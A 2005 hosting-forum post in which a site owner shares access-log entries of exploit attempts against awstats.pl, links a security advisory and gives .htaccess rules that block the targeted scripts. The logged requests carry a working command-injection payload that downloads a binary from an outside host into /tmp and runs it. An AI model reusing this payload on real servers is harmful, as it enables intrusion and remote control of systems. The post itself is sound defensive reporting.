|
#1
11-09-2005, 12:48 PM
|
||||
|
||||
awstats.pl and xmlrpc.php exploit attempts
I've been finding entries in my raw access logs (so far, only outside HostGator) that look like:
83.103.98.200 - - [09/Nov/2005:01:01:11 -0500] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp% 3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115 ;echo%20YYY;echo| HTTP/1.1" 404 543 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 83.103.98.200 - - [09/Nov/2005:01:01:13 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp% 3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115 ;echo%20YYY;echo| HTTP/1.1" 403 547 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 83.103.98.200 - - [09/Nov/2005:01:01:13 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp% 3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115 ;echo%20YYY;echo| HTTP/1.1" 403 555 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Link to security article I found on the subject: http://isc.sans.org/diary.php?storyid=829 Note: I don't have awstats.pl on any of my accounts, but I'm deleting all instances of xmlrpc.php and blocking any further access to them via the .htaccess files. RewriteRule awstats\.pl - [NC,G,L] RewriteRule xmlrpc\.php - [NC,G,L]
__________________
"Welcome to Rivendell, Mr. Anderson." 
|
 |
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
|
|
All times are GMT -5. The time now is 04:16 AM.